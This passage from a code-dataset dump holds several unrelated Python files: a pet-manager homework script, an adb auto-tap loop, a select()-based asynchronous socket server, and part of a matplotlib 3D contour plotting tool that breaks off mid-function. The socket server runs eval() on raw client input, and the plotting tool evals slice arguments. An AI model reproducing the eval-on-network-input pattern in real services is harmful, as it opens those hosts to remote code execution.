\"编号:{},名称:{},种类{},价格:{}\".format(\n\t\t\t\t\tpet[\"id\"],\n\t\t\t\t\tpet[\"name\"],\n\t\t\t\t\tpet[\"category\"],\n\t\t\t\t\tpet[\"price\"],\n\t\t\t\t)\n\t\t\tprint(pet)\n\ndef delete_pet():\n\tID = input(\"请输入编号:\").strip()\n\tfor pet in PETS:\n\t\tif pet['id'] == ID:\n\t\t\tPETS.remove(pet)\n\t\t\tprint(\"恭喜,删除成功\")\n\t\t\tbreak\n\ndef list_pet():\n\tfor pet in PETS:\n\t\ttext = \"编号:{},名称:{},种类{},价格:{}\".format(\n\t\t\t\tpet['id'],\n\t\t\t\tpet['name'],\n\t\t\t\tpet['category'],\n\t\t\t\tpet['price'],\n\t\t\t)\n\t\tprint(text)\n\ndef exit_program():\n\twith open(FILENAME,'w',encoding='utf-8') as fp:\n\t\tlines = []\n\t\tfor pet in PETS:\n\t\t\ttext = \"{ID}/{name}/{category}/{price}\".format(\n\t\t\t\t\tID = pet['id'],\n\t\t\t\t\tname = pet['name'],\n\t\t\t\t\tcategory = pet['category'],\n\t\t\t\t\tprice = pet['price']\n\t\t\t)\n\t\t\tlines.append(text+'\\n')\n\t\tfp.writelines(lines)\n\ndef main():\n\tprint(\"=\"*30)\n\tprint(\"1. 添加宠物\")\n\tprint(\"2. 查找宠物\")\n\tprint(\"3. 删除宠物\")\n\tprint(\"4. 列出宠物\")\n\tprint(\"5. 
退出程序\")\n\tprint(\"=\"*30)\n\twhile True:\n\t\toption = input(\"请输入选项\").strip()\n\t\tif option == \"1\":\n\t\t\tadd_pet()\n\t\telif option == \"2\":\n\t\t\tsearch_pet()\n\t\telif option == \"3\":\n\t\t\tdelete_pet()\n\t\telif option == \"4\":\n\t\t\tlist_pet()\n\t\telif option == \"5\":\n\t\t\texit_program()\n\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"请输入正确的选项\")\n\nmain()","sub_path":"basic/day7/homework/02_pet_manager.py","file_name":"02_pet_manager.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"515570111","text":"import os\nimport time\nimport random\n\n\ndef play():\n while True:\n times = random.randint(5, 15)\n print(times)\n time.sleep(times)\n os.system('adb shell input tap 520 2000')\n times2 = random.randint(3, 6)\n print(times2)\n time.sleep(times2)\n os.system('adb shell input tap 520 2000')\n\n\nplay()\n","sub_path":"tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"402883755","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport errno\nimport signal\nimport select\nimport socket\nimport logging\nimport time\n\n\nlogger = logging.getLogger('main')\n\n\nBIND_ADDRESS = ('localhost', 8999)\nBACKLOG = 5\n\n\nclass Handler:\n\n def __init__(self, sock, clinet_ip, client_port):\n self.log('Start to process request from %s:%d' % (clinet_ip, client_port))\n self.sock = sock\n self.ready_to_read = True\n self.ready_to_write = False\n self.i_am_done = False\n self.in_buffer = b''\n self.out_buffer = b''\n self.wait_until = 1e10 # недостижимое время\n\n def log(self, message):\n logger.info('[id=%d] %s' % (id(self), message))\n\n def get_data_from_socket(self):\n while True:\n chank = self.sock.recv(1024)\n self.in_buffer += chank\n if len(chank) < 1024:\n break\n if self.in_buffer.endswith(b'\\n'):\n self.log('In buffer collected: ' + repr(self.in_buffer))\n self.ready_to_read = False\n # ждём 5 секунд (изображаем обращение к внешнему процессу)\n self.wait_until = time.time() + 5\n\n def time_tick(self):\n if time.time() < self.wait_until:\n return\n # получаем результат\n try:\n result = str(eval(self.in_buffer, {}, {}))\n except Exception as e:\n result = repr(e)\n self.out_buffer = result.encode('utf-8') + b'\\r\\n'\n self.log('Out buffer ready: ' + repr(self.out_buffer))\n # выставляем флаг, что мы готовы отдавать результат\n self.ready_to_write = True\n\n def write_data_to_socket(self):\n n = self.sock.send(self.out_buffer)\n if n == len(self.out_buffer):\n # все отправлено\n self.log('Done.')\n self.i_am_done = True\n self.ready_to_write = False\n self.sock.close()\n else:\n # удаляем часть буфера, которая уже отправлена\n self.out_buffer = self.out_buffer[n:]\n\n\nclass Listner:\n\n def __init__(self, sock):\n self.ready_to_read = True\n self.ready_to_write = False\n self.i_am_done = False\n\n def time_tick(self):\n pass # затычка для совместимости\n\n\n# глобальная карта соответствия fileno <-> объект_обработчик\nsocket_map = {}\n\n\ndef serve_forever():\n # создаём слушающий сокет\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # re-use port\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.bind(BIND_ADDRESS)\n sock.listen(BACKLOG)\n # слушаем и при получении нового входящего соединения,\n # порождаем объект Handler, который будет его обрабатывать\n logger.info('Listning no %s:%d...' 
# add the listening socket to the map, wrapped in a Listner\n    # so that all context objects share a single interface\n    socket_map[sock.fileno()] = Listner(sock)\n    while True:\n        # collect all sockets that have pending\n        # read or write operations\n        to_read = []\n        to_write = []\n        for fileno, obj in socket_map.items():\n            obj.time_tick()\n            if obj.ready_to_read:\n                to_read.append(fileno)\n            if obj.ready_to_write:\n                to_write.append(fileno)\n        # check the actual state of each socket and its\n        # readiness for input/output\n        has_data_to_read, waiting_for_writing, errors = select.select(\n            to_read, to_write, [], 1)\n        # handle all reads\n        for fileno in has_data_to_read:\n            obj = socket_map[fileno]\n            # check the type of the socket\n            if type(obj) is Listner:\n                # a new incoming connection arrived\n                try:\n                    connection, (client_ip, clinet_port) = sock.accept()\n                except IOError as e:\n                    if e.errno == errno.EINTR:\n                        continue\n                    raise\n                # make it non-blocking\n                connection.setblocking(0)\n                # create a new object that will serve\n                # the connection asynchronously\n                socket_map[connection.fileno()] = Handler(\n                    connection,\n                    client_ip,\n                    clinet_port)\n            else:\n                # data arrived on an existing connection\n                obj.get_data_from_socket()\n        # handle all writes (straightforward, no special cases)\n        for fileno in waiting_for_writing:\n            socket_map[fileno].write_data_to_socket()\n        # remove all handlers that have finished their work\n        to_delete = []\n        for fileno, obj in socket_map.items():\n            if obj.i_am_done:\n                to_delete.append(fileno)\n        for fileno in to_delete:\n            del socket_map[fileno]\n\n\ndef main():\n    # configure logging\n    logger.setLevel(logging.DEBUG)\n    ch = logging.StreamHandler()\n    ch.setLevel(logging.DEBUG)\n    formatter = logging.Formatter(\n        '%(asctime)s [%(levelname)s] %(message)s',\n        '%H:%M:%S'\n    )\n    ch.setFormatter(formatter)\n    logger.addHandler(ch)\n    logger.info('Run')\n    # start the server\n    serve_forever()\n\n\nmain()","sub_path":"elemetory/assyncserver.py","file_name":"assyncserver.py","file_ext":"py","file_size_in_byte":6080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"154354995","text":"#!/usr/bin/python3\n\n## dependencies\nfrom pylab import *\nimport matplotlib as mplt\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport math\nimport argparse\nfrom module_getarg import getarg\nfrom matplotlib.collections import LineCollection, PolyCollection\nfrom matplotlib import colors\nfrom matplotlib.colors import colorConverter\nfrom argparse import RawTextHelpFormatter\nfrom module_io import *\n\n# ignore warnings\nimport warnings\nwarnings.filterwarnings(\"ignore\", module=\"matplotlib\")\n\n# tag\nprogram = 'volcon'\nprint()\n\n# read arguments\nparser = argparse.ArgumentParser(description='''\n    purpose:\n        Plot a 3D array as a full or cropped volume of contours.\n    ''',\n                                 formatter_class=RawTextHelpFormatter)\nparser = getarg(parser, program)\nargs = parser.parse_args()\n\n# input\ndata, n1, n2, n3, dmin, dmax = read_array(args, which='fore', dim=3)\nmask, _, _, _, _, _ = read_array(args, which='mask', dim=3)\nif mask is not None:\n    data = data * mask\n\nd1 = float(args.d1)\nd2 = float(args.d2)\nd3 = float(args.d3)\n\n## limit of axis\nfrom module_range import *\nsp1beg, sp1end, x1beg, x1end, n1beg, n1end = set_range(args.o1, n1, d1, args.x1beg, args.x1end)\nsp2beg, sp2end, x2beg, x2end, n2beg, n2end = set_range(args.o2, n2, d2, args.x2beg, args.x2end)\nsp3beg, sp3end, x3beg, x3end, n3beg, n3end = set_range(args.o3, n3, 
d3, args.x3beg, args.x3end)\n\nn1 = n1end - n1beg + 1\nn2 = n2end - n2beg + 1\nn3 = n3end - n3beg + 1\n\n## set slice\n# axis 1\nif args.slice1 is None:\n    sl1 = (x1end + x1beg) / 2.0\nelse:\n    sl1 = eval(args.slice1)\n\n# axis 2\nif args.slice2 is None:\n    sl2 = (x2end + x2beg) / 2.0\nelse:\n    sl2 = eval(args.slice2)\n\n# axis 3\nif args.slice3 is None:\n    sl3 = (x3end + x3beg) / 2.0\nelse:\n    sl3 = eval(args.slice3)\n\n# slice index\nslice1 = int(round((sl1 - sp1beg) / d1))\nslice2 = int(round((sl2 - sp2beg) / d2))\nslice3 = int(round((sl3 - sp3beg) / d3))\nif slice1 <= 0 or slice1 >= n1end:\n    print('error: slice 1 selection error')\n    exit()\nif slice2 <= 0 or slice2 >= n2end:\n    print('error: slice 2 selection error')\n    exit()\nif slice3 <= 0 or slice3 >= n3end:\n    print('error: slice 3 selection error')\n    exit()\n\n# recalculate slice position\nsl1 = x1beg + (slice1 - n1beg) * d1\nsl2 = x2beg + (slice2 - n2beg) * d2\nsl3 = x3beg + (slice3 - n3beg) * d3\n\n# a slice cut is requested if any of the three slice arguments was given\ntakeslice = args.slice1 is not None or args.slice2 is not None or args.slice3 is not None\n\n# select data based on angle\nif args.angle is None:\n    angle1 = 40.0\n    angle2 = 10.0\nelse:\n    angles = args.angle[0].split(',')\n    if len(angles) == 1:\n        angle1 = float(args.angle[0])\n        angle2 = 0.0\n    if len(angles) == 2:\n        angle1 = float(angles[0])\n        angle2 = float(angles[1])\n\n# check angle ranges\noctant = args.octant\nif not (octant in ['--+', '---', '-+-', '-++']):\n    print('error: octant should be one of --+, ---, -+-, -++')\n    exit()\nif angle1 < 0 or angle1 > 90 or angle2 < 0 or angle2 > 90:\n    print('error: angles should be in [0,90]')\n    exit()\n\n# reassign angle\nangles = [angle1, angle2]\noctant_1 = (octant == '--+')\noctant_2 = (octant == '---')\noctant_3 = (octant == '-+-')\noctant_4 = (octant == '-++')\n\nif octant_1: # --+\n\n    # note the global index of slices\n    # for different view angles, the indices are different\n\n    # slice data\n    # slice xy\n    data12 = data[n1beg:slice1 + 1, n2beg:slice2 + 1, slice3]\n    if args.norm == 'log': data12 = np.log10(data12)\n\n    # slice xz\n    data13 = data[n1beg:slice1 + 1, slice2, slice3:n3end]\n    if args.norm == 'log': data13 = np.log10(data13)\n\n    # slice yz\n    data23 = data[slice1, n2beg:slice2 + 1, slice3:n3end]\n    if args.norm == 'log': data23 = np.log10(data23)\n\n    # face data\n    # slice xy\n    fdata12 = data[n1beg:n1end, n2beg:n2end, n3end - 1]\n    if args.norm == 'log': fdata12 = np.log10(fdata12)\n\n    # slice xz\n    fdata13 = data[n1beg:n1end, n2beg, n3beg:n3end]\n    if args.norm == 'log': fdata13 = np.log10(fdata13)\n\n    # slice yz\n    fdata23 = data[n1beg, n2beg:n2end, n3beg:n3end]\n    if args.norm == 'log': fdata23 = np.log10(fdata23)\n\n    # mask (1 marks the cut-away corner) applied to the outer faces\n    if takeslice:\n        mask = np.zeros([n1, n2, n3])\n        mask[n1beg:slice1, n2beg:slice2, slice3 + 1:n3end] = 1\n        mask12 = mask[n1beg:n1end, n2beg:n2end, n3end - 1]\n        mask13 = mask[n1beg:n1end, n2beg, n3beg:n3end]\n        mask23 = mask[n1beg, n2beg:n2end, n3beg:n3end]\n    else:\n        mask = []\n        mask12 = []\n        mask13 = []\n        mask23 = []\n\nif octant_2: # ---\n\n    # slice data\n    # slice xy\n    data12 = data[n1beg:slice1 + 1, n2beg:slice2 + 1, slice3]\n    if args.norm == 'log': data12 = np.log10(data12)\n\n    # slice xz\n    data13 = data[n1beg:slice1 + 1, slice2, n3beg:slice3 + 1]\n    if args.norm == 'log': data13 = np.log10(data13)\n\n    # slice yz\n    data23 = data[slice1, n2beg:slice2 + 1, n3beg:slice3 + 1]\n    if args.norm == 'log': data23 = np.log10(data23)\n\n    # face data\n    # slice xy\n    fdata12 = data[n1beg:n1end, n2beg:n2end, n3beg]\n    if args.norm == 'log': fdata12 = np.log10(fdata12)\n\n    # 
slice xz\n fdata13 = data[n1beg:n1end, n2beg, n3beg:n3end]\n if args.norm == 'log': fdata13 = np.log10(fdata13)\n\n # slice yz\n fdata23 = data[n1beg, n2beg:n2end, n3beg:n3end]\n if args.norm == 'log': fdata23 = np.log10(fdata23)\n\n if takeslice:\n mask = np.zeros([n1, n2, n3])\n mask[n1beg:slice1, n2beg:slice2, n3beg:slice3] = 1\n mask12 = mask[n1beg:n1end, n2beg:n2end, n3beg]\n mask13 = mask[n1beg:n1end, n2beg, n3beg:n3end]\n mask23 = mask[n1beg, n2beg:n2end, n3beg:n3end]\n else:\n mask = []\n mask12 = []\n mask13 = []\n mask23 = []\n\nif octant_3: # -+-\n\n # slice data\n # slice xy\n data12 = data[n1beg:slice1 + 1, slice2:n2end, slice3]\n if args.norm == 'log': data12 = np.log10(data12)\n\n # slice xz\n data13 = data[n1beg:slice1 + 1, slice2, n3beg:slice3 + 1]\n if args.norm == 'log': data13 = np.log10(data13)\n\n # slice yz\n data23 = data[slice1, slice2:n2end, n3beg:slice3 + 1]\n if args.norm == 'log': data23 = np.log10(data23)\n\n # face data\n # slice xy\n fdata12 = data[n1beg:n1end, n2beg:n2end, n3beg]\n if args.norm == 'log': fdata12 = np.log10(fdata12)\n\n # slice xz\n fdata13 = data[n1beg:n1end, n2end - 1, n3beg:n3end]\n if args.norm == 'log': fdata13 = np.log10(fdata13)\n\n # slice yz\n fdata23 = data[n1beg, n2beg:n2end, n3beg:n3end]\n if args.norm == 'log': fdata23 = np.log10(fdata23)\n\n if takeslice:\n mask = np.zeros([n1, n2, n3])\n mask[n1beg:slice1, slice2 + 1:n2end, n3beg:slice3] = 1\n mask12 = mask[n1beg:n1end, n2beg:n2end, n3beg]\n mask13 = mask[n1beg:n1end, n2end - 1, n3beg:n3end]\n mask23 = mask[n1beg, n2beg:n2end, n3beg:n3end]\n else:\n mask = []\n mask12 = []\n mask13 = []\n mask23 = []\n\nif octant_4: # -++\n\n # slice data\n # slice xy\n data12 = data[n1beg:slice1 + 1, slice2:n2end, slice3]\n if args.norm == 'log': data12 = np.log10(data12)\n\n # slice xz\n data13 = data[n1beg:slice1 + 1, slice2, slice3:n3end]\n if args.norm == 'log': data13 = np.log10(data13)\n\n # slice yz\n data23 = data[slice1, slice2:n2end, slice3:n3end]\n if args.norm == 'log': data23 = np.log10(data23)\n\n # face data\n # slice xy\n fdata12 = data[n1beg:n1end, n2beg:n2end, n3end - 1]\n if args.norm == 'log': fdata12 = np.log10(fdata12)\n\n # slice xz\n fdata13 = data[n1beg:n1end, n2end - 1, n3beg:n3end]\n if args.norm == 'log': fdata13 = np.log10(fdata13)\n\n # slice yz\n fdata23 = data[n1beg, n2beg:n2end, n3beg:n3end]\n if args.norm == 'log': fdata23 = np.log10(fdata23)\n\n if takeslice:\n mask = zeros([n1, n2, n3])\n mask[n1beg:slice1, slice2 + 1:n2end, slice3 + 1:n3end] = 1\n mask12 = mask[n1beg:n1end, n2beg:n2end, n3end - 1]\n mask13 = mask[n1beg:n1end, n2end - 1, n3beg:n3end]\n mask23 = mask[n1beg, n2beg:n2end, n3beg:n3end]\n else:\n mask = []\n mask12 = []\n mask13 = []\n mask23 = []\n\n## set figure size\n# inch per point\nipp = 0.0138889\n\n# default longest axis of three figures is 5 inch\nfigbase = 5.0\ngolden_ratio = 1.0 / 1.61803398875\nnmax = max(n1end - n1beg, n2end - n2beg, n3end - n3beg)\n\n# if figure width/height or vice versa larger than 6 then use golden ratio\nlimit = 6.0\n\nif args.size1 is None:\n ratio = float(n1end - n1beg) / nmax\n if ratio < 1.0 / limit:\n ratio = golden_ratio\n size1 = figbase * ratio\nelse:\n size1 = float(args.size1)\n\nif args.size2 is None:\n ratio = float(n2end - n2beg) / nmax\n if ratio < 1.0 / limit:\n ratio = golden_ratio\n size2 = figbase * ratio\nelse:\n size2 = float(args.size2)\n\nif args.size3 is None:\n ratio = float(n3end - n3beg) / nmax\n if ratio < 1.0 / limit:\n ratio = golden_ratio\n size3 = figbase * ratio\nelse:\n size3 = 
float(args.size3)\n\n## set font\nfrom module_font import *\nfont, fontbold = set_font(args)\n\n\n## projection operation\n# axonometric projection\ndef isometric_projection(x, y, z, angles):\n alpha = angles[0]\n beta = angles[1]\n bx = x * np.cos(alpha * np.pi / 180.0) - y * np.cos(beta * np.pi / 180.0)\n by = z + x * np.sin(alpha * np.pi / 180.0) + y * np.sin(beta * np.pi / 180.0)\n return bx, by\n\n\n## plot contour and axis on deformed rectangular mesh\ndef project_contour(args, ax, data, px, py, colormap, cmin, cmax, font, mask=[]):\n\n # determine input dimension\n n1, n2 = data.shape\n\n # generate shape functions\n s1 = np.linspace(1, 0, n1)\n s2 = np.linspace(0, 1, n1)\n s3 = np.linspace(1, 0, n2)\n s4 = np.linspace(0, 1, n2)\n\n shapes = [[[s1[i] * s3[j], s2[i] * s3[j], s2[i] * s4[j], s1[i] * s4[j]] for j in range(0, n2)]\n for i in range(0, n1)]\n\n # triangulartion\n nnx = np.zeros([n1, n2])\n nny = np.zeros([n1, n2])\n for i in range(0, n1):\n for j in range(0, n2):\n nnx[i, j] = sum(shapes[i][j] * np.asarray(px))\n nny[i, j] = sum(shapes[i][j] * np.asarray(py))\n nnx = nnx.flatten()\n nny = nny.flatten()\n data = data.flatten()\n mesh = mplt.tri.Triangulation(nnx, nny)\n\n # if automatically determine contour levels\n mcontour = int(args.mcontour) + 1\n if mcontour <= 0:\n print('sublevel contour specification error')\n exit()\n\n # linear data norm\n if args.norm == 'linear':\n\n if args.contours is None:\n\n if args.contourlevel is None:\n ctrd = nice((cmax - cmin) / 10.0)\n else:\n ctrd = float(args.contourlevel)\n\n if args.contourbeg is None:\n ctrbeg = nice(cmin)\n base = 0.5\n nb = 0\n while nb <= 10 and ctrbeg > cmin + ctrd:\n base = base / 10.0\n ctrbeg = nice(cmin, base)\n nb = nb + 1\n else:\n ctrbeg = float(args.contourbeg)\n if args.contourend is None:\n ctrend = cmax\n else:\n ctrend = float(args.contourend)\n\n # contour levels\n levels = np.arange(ctrbeg, ctrend + 0.5 * abs(ctrd) / float(mcontour), ctrd / float(mcontour))\n levels = np.append(levels, levels[-1])\n\n # if explicitly specify contour levels\n else:\n\n # major levels\n levels = args.contours[0].split(',')\n for i in range(0, size(levels)):\n levels[i] = float(levels[i])\n\n # calculate minor levels\n tls = levels[0]\n for i in range(0, size(levels) - 1):\n tls = np.append(tls, np.linspace(levels[int(i)], levels[int(i) + 1], mcontour + 1))\n levels = unique(tls)\n levels = np.append(levels, levels[-1])\n\n # log data norm\n if args.norm == 'log':\n\n if args.contours is None:\n\n if args.contourbeg is None:\n ctrbeg = np.floor(cmin)\n else:\n ctrbeg = float(args.contourbeg)\n if args.contourend is None:\n ctrend = np.ceil(cmax) + 1\n else:\n ctrend = float(args.contourend)\n\n if args.contourlevel is None:\n ctrd = max(1, int((ctrbeg - ctrend) / 5.0))\n else:\n ctrd = int(args.contourlevel)\n\n # contour levels\n levels = np.arange(ctrbeg, ctrend + ctrd, ctrd)\n levels = np.append(levels, levels[-1] + 1)\n nl = len(levels)\n mlevels = []\n for i in range(0, nl - 1):\n mlevels = np.append(\n mlevels, np.log10(np.linspace(10**levels[i], 10**levels[i + 1], args.mcontour + 2)))\n levels = np.unique(mlevels)\n levels = np.append(levels, levels[-1])\n\n # if explicitly specify contour levels\n else:\n\n # major levels\n levels = args.contours[0].split(',')\n for i in range(0, size(levels)):\n levels[i] = float(levels[i])\n\n # calculate minor levels\n tls = levels[0]\n for i in range(0, size(levels) - 1):\n tls = np.append(\n tls, np.log10(np.linspace(10**levels[int(i)], 10**levels[int(i) + 1], 
mcontour + 1)))\n levels = unique(tls)\n levels = np.append(levels, levels[-1])\n\n # contour font size\n if args.clabelsize is None:\n clabelsize = min(float(args.label1size), float(args.label2size)) - 1\n else:\n clabelsize = float(args.clabelsize)\n\n # contour widths\n if args.mcontourwidth is None:\n mw = 0.25 * float(args.contourwidth)\n else:\n mw = float(args.mcontourwidth)\n\n lw = np.asarray([mw for i in range(0, size(levels))])\n lw[0:-1:mcontour] = float(args.contourwidth)\n\n ls = np.array([args.mcontourstyle for i in range(0, size(levels))])\n ls[0:-1:mcontour] = args.contourstyle\n\n lc0 = args.contourcolor[0].split(',')\n lc = ['k' for i in range(0, size(levels))]\n lc[0:size(lc0)] = lc0\n\n # show filled contours if necessary\n # fill contours use full mesh since no need to worry about overlap\n if args.contourfill:\n if args.norm == 'linear':\n cf = ax.tricontourf(mesh,\n data,\n levels[0:size(levels) - 1],\n cmap=colormap,\n antialiased=True,\n extend='both')\n if args.norm == 'log':\n from matplotlib.colors import LogNorm\n cf = ax.tricontourf(mesh,\n data,\n levels[0:size(levels) - 1],\n cmap=colormap,\n antialiased=True,\n norm=LogNorm(cmin, cmax))\n for l in cf.collections:\n l.set_edgecolor('face')\n l.set_linewidth(0.025)\n\n # show ordinary contours by default\n # triangular mesh mask\n if len(mask) > 0:\n mask = mask.flatten()\n mask = mask[mesh.triangles].mean(axis=1)\n mask = np.where(mask > 0.33333333, 1, 0)\n mesh.set_mask(mask)\n\n # contours use masked mesh since otherwise overlap\n cs = ax.tricontour(mesh,\n data,\n levels[0:size(levels) - 1],\n colors=lc,\n linewidths=lw,\n linestyles=ls,\n antialiased=True)\n # inline=True,\n\n if clabelsize != 0:\n\n # choose label levels\n lvl = cs.levels[::mcontour]\n\n # set format\n clabels = ['' for i in range(0, size(lvl))]\n if args.norm == 'linear':\n for i in range(0, size(lvl)):\n if lvl[i] != 0 and (abs(lvl[i]) < 1.0e-3 or abs(lvl[i]) > 1.0e3):\n scalar = int(floor(log10(abs(lvl[i]))))\n cscale = pow(10, scalar)\n clabels[i] = ('%f' % (lvl[i] / cscale)\n ).rstrip('0').rstrip('.') + r'$\\mathregular{\\times 10^{%i}}$' % scalar\n else:\n clabels[i] = ('%f' % (lvl[i])).rstrip('0').rstrip('.')\n\n if args.norm == 'log':\n for i in range(0, size(lvl)):\n clabels[i] = r'$\\mathregular{10^{%i}}$' % (lvl[i])\n\n fmt = {}\n for l, s in zip(cs.levels[::mcontour], clabels):\n fmt[l] = s\n\n # place contour labels\n clabels = ax.clabel(cs, cs.levels[::mcontour], inline=True, fmt=fmt,\n fontsize=clabelsize) #, fontproperties=font)\n # ax.get_label.set_fontproperties(font)\n # ax.get_label.set_size(font)\n for txt in clabels:\n txt.set_fontproperties(font)\n txt.set_fontsize(clabelsize)\n txt.set_color(args.clabelcolor)\n if args.clabelbackcolor is not None:\n txt.set_backgroundcolor(args.clabelbackcolor)\n\n\n## plot image and axis on deformed rectangular mesh\ndef project_image(ax, data, px, py, colormap, cmin, cmax):\n\n # determine input dimension\n n1, n2 = data.shape\n n1 = n1 + 1\n n2 = n2 + 1\n\n # generate shape functions\n s1 = np.linspace(1, 0, n1)\n s2 = np.linspace(0, 1, n1)\n s3 = np.linspace(1, 0, n2)\n s4 = np.linspace(0, 1, n2)\n\n shapes = [[[s1[i] * s3[j], s2[i] * s3[j], s2[i] * s4[j], s1[i] * s4[j]] for j in range(0, n2)]\n for i in range(0, n1)]\n\n # do projection\n nnx = [[sum(shapes[i][j] * np.asarray(px)) for j in range(0, n2)] for i in range(0, n1)]\n nny = [[sum(shapes[i][j] * np.asarray(py)) for j in range(0, n2)] for i in range(0, n1)]\n\n # pcolor fast is the fastest way, using polygon 
collections is slow\n im = ax.pcolorfast(nnx, nny, data, linewidth=0, edgecolor='none', antialiased=True)\n im.set_cmap(colormap)\n im.set_clim(cmin, cmax)\n im.set_rasterized(True)\n\n\nfrom module_utility import *\n\n\ndef project_axis(ax, p1x, p1y, p2x, p2y, ticks, tickbeg, tickend, tickd, mtick, xbeg, xend, ns, d, font,\n tick_major_len, tick_major_width, tick_minor_len, tick_minor_width, axislen, tick_orient,\n ticklabel_orient, tick_size, label, label_orient, label_size, label_pad, tick_format):\n\n # regular ticks\n if ticks is None:\n\n # major tick interval\n if tickd is None:\n tick_interval = nice((xend - xbeg) / 5.0)\n if tick_interval == 0:\n tick_interval = 1.0e10\n else:\n tick_interval = float(tickd)\n\n # tick begin location\n if tickbeg is None:\n tick_beg = nice(xbeg)\n base = 0.5\n nb = 0\n if tick_interval > 0:\n while nb <= 10 and tick_beg > xbeg + tick_interval:\n base = base / 10.0\n tick_beg = nice(xbeg, base)\n nb = nb + 1\n else:\n while nb <= 10 and tick_beg < xbeg + tick_interval:\n base = base / 10.0\n tick_beg = nice(xbeg, base)\n nb = nb + 1\n else:\n tick_beg = float(tickbeg)\n\n # tick end location\n if tickend is None:\n tick_end = tick_beg + (round((xend - xbeg) / tick_interval) + 2) * tick_interval\n if tick_interval > 0:\n while tick_end < xend:\n tick_end = tick_end + abs(tick_interval)\n else:\n while tick_end > xend:\n tick_end = tick_end - abs(tick_interval)\n else:\n tick_end = float(tickend)\n\n # regular major and minor tick locations\n tick = np.arange(tick_beg, tick_end + 0.1 * abs(tick_interval), tick_interval)\n minor_tick_interval = tick_interval / (mtick + 1.0)\n minor_tick = np.arange(tick_beg, tick_end + 0.1 * abs(minor_tick_interval), minor_tick_interval)\n\n # some ticks might out of axis range\n if d > 0:\n tick = np.asarray([i for i in tick if i >= xbeg and i <= xend])\n minor_tick = np.asarray([i for i in minor_tick if i >= xbeg and i <= xend and (not i in tick)])\n if d < 0:\n tick = np.asarray([i for i in tick if i <= xbeg and i >= xend])\n minor_tick = np.asarray([i for i in minor_tick if i <= xbeg and i >= xend and (not i in tick)])\n\n # linearly scale the ticks to figure canvas\n if ns == 1:\n print('error: contour plot requires at least two points')\n if ns == 2:\n # if only one sample point, then tick location is 0.5\n tick_location = np.asarray([0, axislen])\n ntick = 2\n if ns > 2:\n # if multiple sample points, then scale to apparent axis length\n # !! 
for contour plot remove the 0.5*d extra length\n # tick_location=(tick-xbeg+0.5*d)/((ns-1)*d)*axislen\n tick_location = (tick - xbeg) / ((ns - 2) * d) * axislen\n minor_tick_location = (minor_tick - xbeg) / ((ns - 2) * d) * axislen\n t = tick_location\n\n # set major tick location and labels, note some major ticks might be out of axis range\n tl = []\n tick_label = []\n for i in range(0, len(tick)):\n if tick_location[i] >= 0 and tick_location[i] <= axislen + 1.0e-10:\n tl.append(tick_location[i])\n if tick_format == 'sci' or tick_format == 'plain':\n tick_label.append(('%f' % tick[i]).rstrip('0').rstrip('.'))\n else:\n tick_label.append((tick_format % tick[i]))\n tick_location = tl\n\n # irregular ticks\n else:\n\n # get contents from user-specified ticks\n ticks = ticks[0].split(':')\n location = [0 for i in range(0, len(ticks))]\n label = ['' for i in range(0, len(ticks))]\n\n # set tick locations\n for i in range(0, len(ticks)):\n t = ticks[i].split(',')\n # !!\n # location[i]=(float(t[0])+0.5*d)/((ns-1)*d)*axislen\n location[i] = (float(t[0])) / ((ns - 2) * d) * axislen\n label[i] = t[1]\n\n # sort according to tick location\n yx = list(zip(location, label))\n yx.sort()\n tick_location = [location for location, label in yx]\n tick_label = [label for location, label in yx]\n\n # minor ticks\n mtick = mtick + 1\n minor_tick_location = np.linspace(tick_location[0], tick_location[1], mtick + 1)\n minor_tick_location = minor_tick_location[1:mtick]\n for i in range(1, len(tick_location) - 1):\n t = np.linspace(tick_location[i], tick_location[i + 1], mtick + 1)\n minor_tick_location = np.append(minor_tick_location, t[1:mtick])\n\n # major ticks\n # projection of ticks to target position\n # !! ensure no zero encountered\n if tick_location[-1] == axislen:\n tick_location[-1] = axislen - 1.0e-10\n tx = [p1x + i * (p2x - p1x) / axislen for i in tick_location]\n ty = [p1y + i * (p2y - p1y) / axislen for i in tick_location]\n\n # in the following, the ticks are assumed to be always perpendicular with\n # the axis, whatever the pointing of the axis is\n if tick_orient == 'counterclock':\n # outward pointing -- 90 degree counterclockwise\n # vector is (x1,y1) ----> (x2,y2)\n # outward means the tick should counterclockwise rotate this vector to\n # get ticks\n tx2 = -(p2y - ty)\n ty2 = p2x - tx\n\n if tick_orient == 'clock':\n # inward pointing -- 90 degree clockwise\n # vector is (x1,y1) ----> (x2,y2)\n # inward means the tick should clockwise rotate this vector to\n # get ticks\n tx2 = p2y - ty\n ty2 = -(p2x - tx)\n\n # direct = will cause txx/tyy always equal to tx2/ty2\n txx = [i for i in tx2]\n tyy = [i for i in ty2]\n\n ticklen = tick_major_len * ipp\n for i in range(0, len(tick_location)):\n epx = tx[i] + tx2[i] / sqrt(tx2[i]**2 + ty2[i]**2) * ticklen\n epy = ty[i] + ty2[i] / sqrt(tx2[i]**2 + ty2[i]**2) * ticklen\n tx2[i] = epx\n ty2[i] = epy\n\n # form lines\n majortick = []\n e1 = list(zip(tx, ty))\n e2 = list(zip(tx2, ty2))\n for i in range(0, len(tick_location)):\n majortick.append([e1[i], e2[i]])\n\n majortick = LineCollection(majortick, linewidths=tick_major_width, colors='k')\n ax.add_collection(majortick)\n\n # get center location of the axis\n hx = 0.5 * (p1x + p2x)\n hy = 0.5 * (p1y + p2y)\n\n # get normal vector starting from center location of the axis\n if tick_orient == 'counterclock':\n # outward pointing -- 90 degree counterclockwise\n hx2 = -(p2y - hy)\n hy2 = p2x - hx\n if tick_orient == 'clock':\n # inward pointing -- 90 degree clockwise\n hx2 = p2y - hy\n hy2 = -(p2x - 
